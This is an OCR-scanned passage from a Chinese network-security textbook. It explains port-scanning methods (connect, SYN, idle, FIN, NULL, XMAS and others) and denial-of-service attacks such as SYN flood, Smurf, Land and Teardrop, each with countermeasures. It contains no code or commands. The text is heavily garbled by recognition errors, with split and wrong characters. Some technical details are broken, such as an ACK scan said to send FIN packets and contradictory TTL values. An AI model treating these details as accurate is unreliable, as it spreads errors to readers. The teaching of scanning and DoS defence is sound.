网 络 扫描 技术 是 一 种 基于 Internet 远程 检测 目标 网 络 或 本 地 主机 安全 性 脆弱 点 的 技术 。 
对 于 系统 管理 员 来 说 ,通过 网 络 扫描 ,能 够 发 现 所 维护 的 Web 服务 器 的 各 种 TCP/IP 端口 的 分 
配 、 开 放 的 服务 .Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Internet 上 的 安全 漏洞 ; 对 于 黑 
客 来 说 ,网 络 扫描 技术 则 能 够 发 现 攻 击 目标 的 脆弱 性 和 漏洞 ,便于 下 一 步 实施 攻击 。 

因此 ,对 于 网 络 系统 管理 员 来 说 ,利用 网 络 安全 扫描 技术 ,可 以 用 积极 的 、 非 破坏 性 的 办 
法 来 检验 系统 是 否 有 可 能 被 攻击 崩溃 。 网 络 安 全 扫描 技术 利用 了 一 系列 的 脚本 模拟 对 系统 
进行 攻击 的 行为 ,并 对 结果 进行 分 析 。 这 种 技术 通常 被 用 来 进行 模拟 攻击 实验 和 安全 审计 。 
网 络 安全 扫描 技术 通常 与 防火 墙 、 安 全 监控 系统 互相 配合 ,才能 为 网 络 提供 较 高 的 安全 性 。 

一 次 完整 的 网 络 安全 扫描 分 为 以 下 三 个 阶段 。 

第 一 阶段 : 发 现 目标 主机 或 网 络 。 

第 二 阶段 : 发 现 目标 后 进一步 搜集 目标 信息 ,包括 操作 系统 类 型 .运行 的 服务 以 及 服务 
软件 的 版 本 等 。 如 果 目 标 是 一 个 网 络 ,还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 .路 由 设备 以 及 
各 主机 的 信息 。 

第 三 阶段 : 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 

网 络 安全 扫描 技术 包括 PING 扫射 (Ping Sweep)、 操 作 系统 探测 (Operating System 
Identification) ,访问 控制 规则 探测 (Firewalking)、 端 口 扫描 (Port Scan) 以 及 漏洞 扫描 
(Vulnerability Scan) 等 。 这 些 技术 在 网 络 安全 扫描 的 三 个 阶段 中 各 有 体现 。 

网 络 扫描 的 具体 技术 和 方法 ,特别 是 漏洞 扫描 方法 ,前 面 已 经 进行 了 介绍 。 本 节 主 要 介 
绍 端口 扫描 攻击 的 方法 及 其 防范 措施 。 

2. 端口 扫描 攻击 技术 

TCP/IP 中 的 端口 ,是 网 络 通信 进程 的 一 种 标识 符 。 一 个 端口 就 是 一 个 潜在 的 通信 通 
道 , 也 就 是 一 个 人 侵 通 道 。 对 目标 计算 机 进行 端口 扫描 ,能 得 到 许多 有 用 的 信息 。 通 过 端口 
扫描 ,可 以 得 到 许多 有 用 的 信息 ,从 而 发 现 系统 的 安全 漏洞 。 

所 谓 端口 扫描 ,就 是 利用 Socket 编程 与 目标 主机 的 某 些 端口 建立 TCP 连接 、 进 行 传输 
协议 的 验证 等 ,从 而 获知 目标 主机 的 被 扫 端 口 是 否 处 于 激活 状态 、 主 机 提供 了 哪些 服务 、 提 
供 的 服务 中 是 否 含有 某 些 缺 陷 等 。 

端口 扫描 的 方法 是 : 向 目标 主机 的 TCP/IP 服务 端口 发 送 探测 数据 包 , 并 记录 目标 主机 的 
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响应 。 通 过 分 析 响 应 来 判断 服务 端口 是 打开 还 是 关闭 ,就 可 以 得 知 端口 提供 的 服务 或 信息 。 

端口 扫描 主要 有 完全 连接 扫描 、 半 连接 扫描 ,SYN 扫描 ,间接 扫描 和 隐蔽 (秘密 ) 扫 描 等 。 

1) 完全 连接 扫描 

这 种 方法 最 简单 ,直接 连 到 目标 端口 并 完成 一 个 完整 的 三 次 握手 过 程 (SYN, SYN/ACK 
和 ACK)。 操 作 系统 提供 的 connect() 郴 数 完成 系统 调用 ,用 来 与 每 一 个 感 兴趣 的 目标 计算 
机 的 端口 进行 连接 。 如 果 端 口 处 于 侦 听 状态 ,那么 connect() 函数 就 能 成 功 。 否 则 ,这 个 端 
口 是 不 能 用 的 , 即 没有 提供 服务 。 这 个 技术 的 一 个 最 大 的 优点 是 不 需要 任何 权限 ,系统 中 的 
任何 用 户 都 有 权利 使 用 这 个 调用 。 另 一 个 好 处 是 速度 较 快 。 如 果 对 每 个 目标 端口 以 线性 的 
方式 ,使 用 单独 的 connect() 函数 调用 ,那么 将 会 花费 相当 长 的 时 间 ,为 了 加 快速 度 , 可 以 通 
过 同时 打开 多 个 套 接 字 ,从 而 加 速 扫描 。 使 用 非 阻 塞 1/O 允许 用 户 设 置 一 个 短 的 时 间 周 
期 ,同时 观察 多 个 套 接 字 。 但 这 种 方法 的 缺点 是 很 容易 被 发 觉 ,并 且 很 容易 被 过 滤 掉 。 目 标 
计算 机 的 日 志文 件 会 显示 一 连 串 的 连接 和 连接 出 错 的 服务 消息 ,目标 计算 机 用 户 发 现 后 就 
能 很 快 将 它 关 闭 。 

2) 半 连 接 扫 描 

这 种 扫描 是 指 在 源 主机 和 目的 主机 的 三 次 握手 连接 过 程 中 ,只 完成 前 两 次 ,不 建立 一 次 完 
整 的 连接 。 这 种 方法 向 目标 端口 发 送 一 个 SYN 分 组 (packet) ,如 果 目 标 端口 返回 SYN/ACK 
标志 ,那么 可 以 肯定 该 端口 处 于 监听 状态 ; 否则 ,返回 的 是 RST/ACK 标志 。 这 种 方法 比 第 
一 种 更 具 隐 项 性 ,可 能 不 会 在 目标 系统 中 留 下 扫描 痕迹 。 但 这 种 方法 的 一 一 个 缺点 是 ,必须 要 
有 root 权限 才能 建立 自己 的 SYN 数据 包 。 

3) SYN 扫描 

SYN 扫描 首先 向 目标 主机 发 送 连 接 请 求 , 当 目标 主机 返回 响应 后 ,立即 切断 连接 过 程 ， 
并 查看 响应 情况 。 如 果 目 标 主机 返回 ACK 信息 ,表示 目标 主机 的 该 端口 开放 。 而 目标 主 
机 返回 RESET 信息 , 则 表明 该 端口 没有 开放 。 

4) ID egies 

这 种 扫描 方法 需要 台 第 三 方 机 器 配合 扫描 ,并 且 这 台 机 器 的 网 络 通信 和 量 非 常 少 , 即 
dump 主机 。 eh A 向 dump 主机 B 发 送 连接 的 Ping 包 , 并 且 查 看 主机 B 返回 的 
数据 包 的 ID 头 信息 。 一 般 而 言 ,每 个 按 顺 序 返回 的 数据 包 的 ID 头 的 值 会 按 顺 序 增 加 1, 然 
后 由 源 主机 A 假冒 主机 B 的 地 址 向 C 的 任意 端口 发 送 SYN 数据 包 。 这 时 ,主机 C 向 主机 
B 发 送 的 数据 包 有 两 种 可 能 的 结果 : SYN/ACK ,表示 该 端口 处 于 监听 状态 ; RST/ACK, 表 
示 该 端口 处 于 非 监听 状态 。 那 么 ,由 后 续 Ping 数据 包 的 响应 信息 的 ID 头 信息 ,可 以 看 出 ， 
如 果 主 机 C 的 某 个 端口 是 开放 的 , 则 主机 B 返回 A 的 数据 包 中 ,ID 头 的 值 不 是 以 1 递增 
的 ,而 是 大 于 1 的 值 。 如 果 主 机 C 的 某 个 端口 是 非 开放 的 , 则 主机 B 会 返回 A 的 数据 包 ,ID 
头 的 值 递 增 1 ,非常 规律 。 

5) 隐蔽 扫描 

隐蔽 扫描 是 指 能 够 成 功 地 绕 过 IDS、 防 火 墙 和 监视 系统 等 安全 机 制 , 取 得 目标 主机 端口 
信息 的 一 种 扫描 方式 。 

6) SYN/ACK 扫描 

SYN/ACK 扫描 是 指 由 源 主机 向 目标 主机 的 某 个 端口 直接 发 送 SYN/ACK 数据 包 , 而 
不 是 先 发 送 SYN 信息 包 。 由 于 这 种 方法 不 发 送 SYN 包 , 目 标 主机 会 认为 这 是 一 次 错误 的 
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连接 ,从 而 会 报错 。 如 果 目 标 主机 的 该 端口 没有 开放 , 则 会 返回 RST 信息 。 如 果 目 标 主机 
的 该 端口 处 于 开放 状态 , 则 不 会 返回 任何 信息 ,而 直接 将 这 个 数据 包 抛弃 。 

7) FIN 扫描 

这 种 扫描 方式 不 依赖 于 TCP 的 三 次 握手 过 程 ,而 是 TCP 连接 的 FIN( 结 束 ) 位 标志 。 
原理 在 于 TCP 连接 结束 时 ,会 向 TCP 端口 发 送 一 个 设置 了 FIN 位 的 连接 终止 数据 报 , 关 
闭 的 端口 会 回应 一 个 设置 了 RST 的 连接 复位 数据 报 ; 而 开放 的 端口 则 会 对 这 种 可 疑 的 数 
据 报 不 加 理 上 昭 , 将 它 丢 弃 。 可 以 根据 是 否 收 到 RST 数据 报 来 判断 对 方 的 端口 是 否 开放 。 

此 扫描 方式 的 优点 比 前 几 种 都 要 隐秘 ,不 容易 被 发 现 。 该 方案 有 两 个 缺点 : 首先 ,要 判 
断 对 方 端口 是 否 开放 必须 等 待 超时 ,增加 了 探测 时 间 ,而 且 容易 得 出 错误 的 结论 ; 其 次 ,一 
些 系 统 并 没有 遵循 规定 ,最 典型 的 就 是 Microsoft 公司 所 开发 的 操作 系统 。 这 些 系统 一 旦 
收 到 这 样 的 数据 报 ,无 论 端口 是 否 开放 都 会 回应 一 个 RST 连接 复位 数据 报 , 这 样 一 来 ,这 种 
扫描 方案 对 于 这 类 操作 系统 是 无 效 的 。 

8) ACK 扫描 

ACK 扫描 是 指 首先 由 主机 A 向 目标 主机 B 发 送 FIN 数据 包 , 然 后 查看 反馈 数据 包 的 
TTL 值 和 WIN 值 。 开 放 端 口 所 返回 的 数据 包 的 TTL 值 一 般 不 小 于 64 ,而 关闭 端口 的 返回 值 
一 般 大 于 64。 开 放 端 口 所 返回 数据 包 的 WIN 值 一 般 大 于 0, 而 关闭 端口 返回 的 值 一 般 等 于 0。 

9) NULL 扫描 

NULL 扫描 是 指 将 源 主机 发 送 的 数据 包 中 的 ACK、FIN、RST、SYN、URG、PSH 等 标 
置 位 都 置 空 。 如 果 目 标 主机 没有 返回 任何 信息 , 则 表明 该 端口 是 开放 的 。 如 果 返 回 RST 信 
息 , 则 端口 是 关闭 的 。 

10) XMAS 扫描 

XMAS 扫描 的 原理 与 NULL 扫描 相同 ,只 是 将 主机 发 送 的 数据 包 中 的 ACK、FIN、 
RST、SYN、URG 、PSH 等 标志 位 都 置 1。 如 果 目 标 主机 没有 返回 任何 信息 , 则 表明 该 端口 
是 开放 的 。 对 于 所 有 关闭 的 端口 ,目标 系统 应 该 返回 RST 标志 。 

端口 扫描 是 攻击 者 必 备 的 技术 ,通过 扫描 可 以 掌握 攻击 目标 的 开放 服务 ,根据 扫描 所 获 
得 的 信息 ,为 下 一 步 攻 击 做 好 准备 。Nmap 是 一 个 经 典 的 端口 扫描 器 ,能 实现 上 述 多 种 扫描 
技术 和 方法 。 

3. 端口 扫描 攻击 技术 的 防范 

对 于 端口 扫描 攻击 的 防范 ,仍然 是 通过 监听 端口 的 状态 进行 的 。 

首先 ,可 以 关闭 闲置 和 有 潜在 危险 的 端口 。 在 Windows NT 核心 系统 (Windows 2000/ 
XP/2003/2008) 中 要 关闭 掉 一 些 闲置 端口 是 比较 方便 的 ,可 以 采用 “定向 关闭 指定 服务 的 端 
口 ”? 和 ”* 只 开放 允许 端口 的 方式 ”。 计 算 机 的 一 些 网 络 服务 会 由 系统 分 配 默认 的 端口 ,将 一 些 
闲置 的 服务 关闭 掉 , 其 对 应 的 端口 也 会 被 关闭 了 。 操 作 方 法 为 : 进入 “控制 面板 *“ 管 理工 
具 ”“ 服 务 ” 项 内 ,关闭 掉 计算 机 的 一 些 没有 使 用 的 服务 (如 FTP 服务 .DNS 服务 IIS Admin 
服务 等 ) ,它们 对 应 的 端口 也 被 售 用 了 。 至 于 “只 开放 允许 端口 的 方式 ”, 可 以 利用 系统 的 
“TCP/IP 筛选 ”功能 实现 ,设置 的 时 候 ,“ 只 允许 ”系统 的 一 些 基本 网 络 通信 需要 的 端口 即 可 。 

其 次 ,可 以 定期 检查 各 端口 ,如 发 现 有 端口 扫描 的 症状 时 , 则 应 立即 屏蔽 该 端口 。 当 然 ， 
如 果 靠 人 工 进行 检查 ,效率 非常 低 , 因 此 一 般 要 采用 相应 的 工具 或 者 设备 ,而 防火 墙 就 是 最 
有 效 的 设备 之 一 。 防 火 墙 对 扫描 类 攻击 的 判断 依据 是 : 设置 一 个 时 间 阔 值 ( 微 秒 级 ) , 若 在 
规定 的 时 间 间 隔 内 某 种 数据 包 的 数量 超过 了 某 个 设 定 值 , 即 认定 为 进行 了 一 次 扫描 ,那么 将 
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在 接 下 来 的 一 个 特定 时 间 里 拒绝 来 自 同一 源 的 这 种 扫描 数据 包 。 
5.2.3 拒绝 服务 攻击 及 其 防范 方法 


1. Dos 攻击 的 基本 原理 

拒绝 服务 攻击 (DoS) 是 攻击 者 通过 各 种 手段 来 消耗 网 络 带宽 及 服务 器 的 系统 资源 ,最 
终 导致 服务 器 瘫痪 而 停止 提供 正常 的 网 络 服务 。 拒 绝 服务 攻击 主要 是 利用 TCP/IP 本 身 的 
漏洞 或 利用 网 络 中 各 个 操作 系统 的 IP 协议 栈 的 实现 漏洞 来 发 起 攻击 。 这 种 攻击 主要 是 用 
来 攻击 域名 服务 器 .路 由 器 以 及 其 他 网 络 操作 服务 ,攻击 之 后 造成 被 攻击 者 无 法 正常 运行 和 
工作 ,严重 的 可 以 使 网 络 一 度 瘫痪 。 拒 绝 服务 攻击 会 降低 系统 资源 的 可 用 性 ,这 些 资源 可 以 
是 CPU 时 间 、 磁 盘 空 间 、 打 印 机 ,甚至 是 系统 管理 员 的 时 间 , 结 果 往 往 是 受 攻击 的 目标 的 效 
率 大 幅 降低 甚至 不 能 提供 相应 的 服务 。 由 于 使 用 DoS 攻击 工具 的 技术 瓶颈 低 、 效 果 比 较 明 
显 , 因 此 成 为 当今 网 络 中 十 分 流行 的 一 种 攻击 手段 ,被 黑客 广泛 使 用 。 

常见 的 DoS 攻击 主要 有 三 种 类 型 : 带宽 攻击 .协议 攻击 和 逻辑 攻击 。 

QO 带宽 攻击 是 最 古老 ,最 常见 的 DoS 攻击 。 在 这 种 攻击 中 ,恶意 黑客 使 用 数据 流量 填 
满 网 络 。 脆 弱 的 网 络 或 网 络 设备 由 于 不 能 处 理发 送 给 它 的 大 量 流 量 而 导致 系统 崩溃 和 响应 
速度 减 慢 ,从 而 阻止 合法 用 户 的 访问 。 

攻击 者 在 网 络 上 传输 任何 流量 都 要 消耗 带宽 。 基 本 的 带宽 攻击 能 够 使 用 UDP 或 
ICMP 数据 包 消 耗 掉 所 有 可 用 带宽 。 简 单 的 带宽 攻击 能 够 利用 服务 器 或 网 络 设备 有 甜 吐 量 
限制 从 而 达到 目的 一 一 发 送 大 量 的 小 数据 包 。 快 速 发 送 大 量 数据 包 的 攻击 通常 在 流量 达到 
可 用 带宽 限制 之 前 就 淹没 了 网 络 设备 。 路 由 器 防火 墙 服 务 器 都 存在 输入 /输出 处 理 、 中 断 
处 理 .CPU、 内 存 资源 等 方面 的 约束 。 

@ 协议 攻击 是 利用 网 络 协议 的 弱点 进行 的 网 络 攻 击 。 其 中 ,在 TCP/IP 中 ,较为 常见 
的 攻击 是 攻击 者 发 送 大 量 的 SYN 数据 包 来 对 目标 主机 进行 攻击 。 图 5-1 表示 了 正常 的 
TCP 流量 ,图 5-2 显示 了 当 发 生 SYN 洪流 协议 攻击 时 发 生 的 情况 ,由 于 服务 器 (图 中 为 目 
标 主机 B) 的 用 于 等 待 来 自 客户 机 (图 中 为 源 主机 A) 的 ACK 信息 包 的 TCP/IP 堆栈 是 有 限 
的 ,如 果 缓 冲 区 被 等 待 队列 充满 , 它 将 拒绝 下 一 个 连接 请 求 。 因 此 ,攻击 者 就 可 以 利用 这 个 
漏洞 ,在 瞬间 伪造 大 量 的 SYN 数据 报 ,而 又 不 回复 服务 器 的 SYN 十 ACK 信息 包 , 就 可 达到 
攻击 的 目的 。 目 前 来 看 ,SYN 洪流 是 同时 进行 了 协议 攻击 和 带宽 攻击 的 一 种 攻击 。 


源 主 机 A 目标 主机 B 


源 主机 A 目标 主机 B 


本 SYN | TCP 共 列 溢出 


图 5-1 正常 的 TCP 流量 图 5-2 SYN 洪流 
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@ 逻辑 攻击 。 这 种 攻击 包含 对 组 网 技术 的 深入 理解 ,因此 也 是 一 种 最 高 级 的 攻击 类 
型 。 逻 辑 攻击 的 一 个 典型 示例 是 LAND 攻击 ,这 里 攻击 者 发 送 具有 相同 源 IP 地 址 和 目的 
地 IP 地 址 的 伪 数 据 包 。 很 多 系统 不 能 够 处 理 这 种 引起 混乱 的 行为 ,从 而 导致 前 溃 。 

从 另外 一 个 角度 又 可 将 拒绝 服务 攻击 分 为 两 类 : 网 络 带宽 攻击 和 连通 性 攻击 。 带 宽 攻 
击 是 以 极 大 的 通信 量 冲击 网 络 ,使 网 络 瘫痪 。 连 通 性 攻击 是 用 大 量 的 连接 请 求 冲击 网 络 , 达 
到 破坏 目的 。 

拒绝 服务 攻击 与 其 他 的 攻击 方法 相 比 较 , 具 有 以 下 特点 : @ 难 确认 性 ,拒绝 服务 攻击 很 
难 被 判断 ,用 户 在 自己 的 服务 得 不 到 及 时 响应 时 ,一般 不 会 认为 是 自己 受到 攻击 ,而 是 认为 
可 能 是 系统 故障 造成 一 时 的 服务 失效 ; 四 隐蔽 性 ,正常 请 求 服务 会 隐藏 掉 拒 绝 服务 攻击 的 
过 程 ; @ 资 源 有 限 性 ,由 于 计算 机 资源 有 限 ,容易 实 现 拒绝 服务 攻击 ; @ 软 件 复杂 性 ,由 于 
软件 所 固有 的 复杂 性 ,难以 确保 软件 没有 缺陷 ,因而 攻击 者 有 机 可 乘 , 可 以 直接 利用 软件 缺 
陷 进 行 拒绝 服务 攻击 。 

2. 常见 的 DoS 攻击 方式 及 其 防范 措施 

1) DoS 攻击 的 检测 

DoS 攻击 通常 是 以 消耗 服务 器 端 资 源 、 迫 使 服务 停止 响应 为 目标 ,通过 伪造 超过 服务 器 
处 理 能 力 的 请 求 数据 造成 服务 器 响应 阻塞 ,从 而 使 正常 的 用 户 请 求 得 不 到 应 答 ,以 实现 其 攻 
击 目的 。 这 类 攻击 的 特点 在 于 : 易于 从 受 攻 击 的 目标 来 判断 是 否 发 生 了 攻击 ,而 难以 追踪 
攻击 源 , 因 此 对 于 普通 用 户 , 需 要 正确 地 检测 出 DoS 攻击 ,并 对 其 进行 防范 。 通 常 来 说 , 检 
测 出 DoS 攻击 相对 比较 直观 ,但 如 果 攻 击 是 持续 缓慢 进行 的 , 则 很 难 在 攻击 开始 的 第 一 时 
间 就 被 发 现 。 一 般 来 说 ,可 以 通过 以 下 症状 来 判断 是 否 发 生 了 DoS 攻击 。 

@ 频繁 的 网 络 活动 。 

@ 很 高 的 CPU 利用 率 。 

@ 计算 机 无 响应 。 

@ 计算 机 在 不 确定 的 时 间 崩 溃 。 

2) DoS 攻击 常用 的 工具 

DoS 攻击 通常 通过 一 些 攻击 工具 来 进行 ,了 解 了 这 些 攻击 工具 ,可 以 更 有 效 地 进行 防 
范 。 下 面 是 一 些 常用 的 DoS 攻击 工具 。 

@ SYN Flood 工具 。 依 据 SYN Flood 攻击 的 原理 。 

@ IP 碎片 类 攻击 工具 ,包括 Jot2、Teardrop 和 Newtear。 

Jot2 通过 向 攻击 对 象 发 送 经 过 分 片 的 ICMP 数据 包 , 当 分 片 合成 完整 的 IP 数据 包 时 ， 
其 最 大 长 度 为 65 538 比 最 大 IP 数据 报 65 535 大 , 则 系统 在 重组 数据 报时 , 因 发 生 错误 而 
崩溃 。 

Teardrop 向 被 攻击 对 象 发 送 被 分 成 两 个 分 片 的 IP 数据 报 。 这 两 个 分 片 在 重组 时 ,发 
生 重 稚 , 即 第 二 个 IP 分 片 包含 在 第 一 片 中 ,系统 在 重组 数据 报时 , 因 发 生 错 误 而 崩溃 。 

Newtear 由 Teardrop 衍生 而 来 ,两 者 原理 基本 相同 ,只 是 将 用 于 填充 的 数据 大 小 由 28 
改 为 20。 此 外 ,该 类 工具 还 有 Opentear、Overdrop、Bonk、Boink、Syndrop、SSPing 等 攻击 
工具 。 

@ 网 络 放 大 攻击 工具 。 这 里 主要 有 两 种 工具 : Smurf 和 Fraggle。 

@ 系统 漏洞 攻击 工具 。 这 里 的 漏洞 一 般 指 协议 漏洞 。 常 用 的 工具 有 : Land、 Blat、 
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Kod、Kox、Winnuke、Killwin 等 。 

3) DoS 攻击 常见 的 类 型 及 其 防范 措施 

见 的 针对 网 络 的 拒绝 服务 攻击 方式 有 以 下 几 种 。 针 对 每 一 种 攻击 ,给 出 了 相应 的 防 

范 措施 。 

(1) 同步 风暴 

在 SYN Flood 攻击 中 ,利用 TCP 三 次 握手 协议 的 缺陷 ,攻击 者 向 目标 主机 发 送 大 量 伪 
造 源 地 址 的 TCP SYN 报 文 ,目标 主机 分 配 必要 的 资源 ,然后 向 源 地 址 返回 SYN 十 ACK 包 ， 
并 等 待 源 端 返回 ACK 包 。 由 于 源 地 址 是 伪造 的 ,所 以 源 端 永远 都 不 会 返回 ACK 报 文 , 受 
害 主 机 继续 发 送 SYN 十 ACK 包 , 并 将 半 连 接 放 入 端口 的 积压 队列 中 。 虽 然 一 般 的 主机 都 
有 超时 机 制 和 默认 的 重 传 次 数 ,但 由 于 端口 的 半 连 接 队列 的 长 度 是 有 限 的 ,如 果 不 断 地 向 受 
害 主机 发 送 大 量 的 TCP SYN 报 文 , 半 连接 队列 很 快 就 会 被 填 满 ,服务 器 拒绝 新 的 连接 ,将 
导致 该 端口 无 法 响应 其 他 机 器 进行 的 连接 请 求 ,最终 使 受害 主机 的 资源 耗 尽 。 

防范 措施 : 为 了 有 效 地 防范 TCP SYN Flood 攻击 ,在 保证 通过 慢 速 网 络 的 用 户 可 以 正 
常 建立 到 服务 端的 合法 连接 的 同时 ,需要 尽 可 能 地 减少 服务 端 TCP Backlog 的 清空 时 间 ， 
并 采用 TCP 连接 监控 的 工作 模式 ,在 防火 墙 处 就 能 够 过 滤 掉 来 自 同一 主机 的 后 续 连 接 , 当 
然 还 要 根据 实际 的 情况 来 判断 。 

(2) UDP 洪水 

UDP 洪水 指 利用 简单 的 TCP/IP 服务 ,如 利用 Chargen 服务 和 Echo 传送 毫 无 用 处 的 
占 满 带宽 的 数据 。 通 过 伪造 与 某 一 台 主 机 的 Chargen 服务 器 之 间 的 一 次 UDP 连接 ,回复 
地 址 指向 开放 Echo 服务 的 一 台 主 机 ,生成 在 两 台 主机 之 间 的 足够 多 的 无 用 数据 流 。 

防范 措施 : 关 挤 不 必要 的 TCP/IP 服务 ,对 防火 墙 进行 合理 配置 , 阻 断 来 自 Internet 对 
这 些 服务 的 UDP 请 求 。 

(3) Smurf 攻击 

一 种 简单 的 Smurf 攻击 是 ,将 回复 地 址 设置 成 目标 网 络 的 广播 地 址 ,利用 ICMP 应 答 
请 求 数据 包 ,使 该 网 络 的 所 有 主机 都 对 此 ICMP 应 答 请 求 做 出 应 答 ,导致 网 络 阻塞 ,该 攻击 
方式 比 Ping of Death 洪水 攻击 的 流量 高 出 一 到 两 个 数量 级 。 更 加 复杂 的 Smurf 攻击 将 源 
地 址 改 为 第 三 方 的 目标 地 址 ,最 终 导致 第 三 方 网 络 阻塞 。 

防范 措施 : 去 掉 ICMP 服务 。 

(4) Fraggle 攻击 

Fraggle 攻击 对 Smurf 攻击 做 了 简单 的 修改 ,使 用 的 是 UDP 应 答 消 息 而 非 ICMP。 通 
过 使 用 Chargen 或 Echo UDP 程序 发 起 Fraggle 攻击 ,这 两 个 分 别 使 用 了 UDP 端口 19 和 
7。 它 们 都 像 ICMP Ping 那样 工作 ,设计 用 于 响应 请 求 主机 ,以 便 考察 这 些 主机 是 否 处 于 活 
动 状态 。 由 于 使 用 的 Chargen 和 Echo 会 发 送 响 应 给 向 这 些 端 口 发 送 流量 的 任何 主机 , 因 
此 ,通过 在 这 两 个 端口 之 间 发 送 数 据 , 可 使 这 两 个 程序 建立 一 个 无 限 循环 。 

防范 措施 : 过 滤 掉 UDP 应 答 消息 。 

(5) Land 攻击 

进行 Land 攻击 时 ,构造 的 SYN 包 的 源 地 址 和 目标 地 址 都 被 设置 成 某 一 个 服务 器 地 
址 ,此 举 将 导致 接收 服务 器 向 它 自 己 的 地 址 发 送 SYN-ACK 消息 ,结果 这 个 地 址 又 发 回 
ACK 消息 并 创建 一 个 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 。 
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防范 措施 : 这 类 攻击 的 检测 相对 来 说 比较 容易 ,因为 可 以 直接 通过 判断 网 络 数据 包 的 
源 地 址 和 目标 地 址 是 否 相 同 确认 是 否 属 于 攻击 行为 。 防 范 攻击 的 方法 当然 是 适当 地 配置 防 
火 墙 设备 或 制定 包 过 滤 路 由 器 的 包 过 滤 规 则 ,并 对 这 种 攻击 进行 审计 ,记录 事件 发 生 的 时 
间 、 源 主机 和 目标 主机 的 MAC 地 址 和 IP 地 址 ,从 而 可 以 有 效 地 分 析 并 跟踪 攻击 者 的 来 源 。 

(6) 垃圾 邮件 

攻击 者 利用 邮件 系统 制造 垃圾 邮件 信息 ,甚至 通过 专用 的 邮件 炸弹 程序 给 受害 用 户 的 
信箱 发 送 垃圾 邮件 , 耗 尽 用 户 信 箱 的 磁盘 空间 ,使 用 户 无 法 应 用 这 个 邮箱 。 

防范 措施 : 

限制 邮件 的 转发 功能 。 即 将 凡是 来 自 管理 域 范围 之 外 的 IP 地 址 通过 本 地 SMTP 服务 
进行 的 中 转 邮件 转发 请 求 一 概 予以 拒绝 。 

发 送 邮 件 认证 功能 。 扩 展 的 SMTP 通信 协议 (RFC 2554) 中 包含 一 种 基于 SASL 的 发 
送 邮件 认证 方法 ,目前 多 数 邮件 系统 都 支持 明文 口令 .MD5 认证 ,其 至 基于 公 钥 证 书 的 认证 
方式 。 发 送 邮件 认证 功能 只 是 在 方便 用 户 使 用 的 条 件 下 限制 了 邮件 转发 功能 ,但 是 无 法 拒 
绝 接收 以 本 地 账号 为 地 址 的 垃圾 邮件 。 

邮件 服务 器 的 反 向 域名 解析 功能 。 启 动 该 功能 ,可 以 拒绝 接收 所 有 没有 注册 域名 的 地 
址 发 来 的 信息 。 目 前 ,多 数 垃圾 邮件 发 送 者 使 用 动态 分 配 或 者 没有 注册 域名 的 IP 地 址 来 发 
送 垃圾 邮件 ,以 逃避 追踪 。 因 此 在 邮件 服务 器 上 拒绝 接收 来 自 没 有 域名 的 站 点 发 来 的 信息 
可 以 大 大 降低 垃圾 邮件 的 数量 。 

设置 邮件 过 滤 功 能 ,对 邮件 进行 过 滤 。 垃 圾 邮件 的 过 滤 可 以 基于 IP 地 址 .邮件 的 信 头 
或 者 邮件 的 内 容 ,过 滤 位 置 可 以 在 用 户 .邮件 接收 工具 ,邮件 网 关 、 网 络 网 关 / 路 由 器 /防火 墙 
等 多 个 层次 实施 。 

(7) 消耗 CPU 和 内 存 资源 的 拒绝 服务 攻击 

如 “红色 代码 ”和 NIMDA 病毒 ,就 是 消耗 CPU 和 内 存 资源 的 拒绝 服务 攻击 。 

防范 措施 : 当 发 现 此 类 攻击 时 ,应 通过 防火 墙 或 代理 服务 器 对 相应 的 数据 包 进 行 过 滤 ， 
并 拒绝 对 消耗 CPU 和 内 存 资源 的 访问 。 

(8) 死亡 之 Ping 

早期 ,路 由 器 对 包 的 最 大 尺寸 都 有 限制 ,许多 操作 系统 在 实现 TCP/IP 堆栈 时 ,规定 
ICMP 包 小 于 等 于 64KB, 并 且 在 对 包 的 标题 头 进 行 读 取 之 后 ,要 根据 该 标题 头 中 包含 的 信 
息 为 有 效 载 荷 生成 缓存 区 。 当 产生 畸形 的 .尺寸 超出 可 能 的 上 限 的 ICMP 包 , 即 加 载 的 尺寸 
超过 64KB 上 限时 ,就 会 出 现 内 存 分 配 错误 ,导致 TCP/IP 堆栈 崩溃 ,使 接收 机 器 停机 。 

防范 措施 : 现在 所 有 的 标准 TCP/IP 实现 都 可 以 对 付 超大 尺寸 的 包 , 并 且 大 多 数 防火 
墙 能 够 自动 过 滤 这 些 攻击 ,从 Windows 98 之 后 的 操作 系统 如 Windows NT(Service Pack 3 
之 后 ) 、Solaris 和 Mac OS 都 具有 抵抗 一 般 Ping of Death 攻击 的 能 力 。 此 外 ,对 防火 墙 进行 
配置 , 阻 断 ICMP 以 及 任何 未 知 协议 ,都 将 防止 此 类 攻击 。 

(9) 泪 滴 攻 击 

泪 滴 攻 击 暴露 出 IP 数据 包 分 解 与 重组 的 弱点 。 当 IP 数据 包 在 网 络 中 传输 时 ,被 分 解 
成 许多 不 同 的 分 片 传输 ,并 借 由 偏 移 量 字 段 作 为 重组 的 依据 。 泪 滴 攻击 通过 加 入 过 多 或 不 
必要 的 偏 移 量 字 段 ,或 把 偏 移 字 有 段 设置 成 不 正确 的 值 ,这 样 接收 端 在 收 到 这 些 分 拆 的 数据 包 
后 ,就 不 能 按 数据 包 中 的 偏 移 字 段 值 正确 组 合 这 些 拆 分 的 数据 包 , 但 接收 端 会 不 断 尝 试 ,这 
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样 就 可 能 致使 目标 计算 机 操作 系统 因 资源 耗 尽 而 崩溃 。 

检测 和 防范 措施 : 检测 这 类 攻击 的 方法 是 对 接收 到 的 分 片 数 据 包 进行 分 析 , 计 算数 据 
包 的 片 偏 移 量 (Offset) 是 否 有 误 。 防 范 措施 是 添加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数 
据 包 ,并 对 这 种 攻击 进行 审计 。 另 外 ,应 尽 可 能 采用 最 新 的 操作 系统 ,或 者 在 防火 墙 上 设置 
分 段 重组 功能 ,由 防火 墙 先 接收 到 同一 源 包 中 的 所 有 拆 分 数据 包 , 然 后 完成 重组 工作 ,而 不 
是 直接 转发 。 因 为 防火 墙 上 可 以 设置 当 出 现 重 又 字 段 时 所 采用 的 规则 。 

3. 防范 DoS 攻击 的 专用 网 络 安全 设备 

DoS 攻击 的 目的 是 阻止 合法 用 户 访问 他 们 所 需要 的 服务 ,使 提供 服务 的 系统 和 网 络 无 
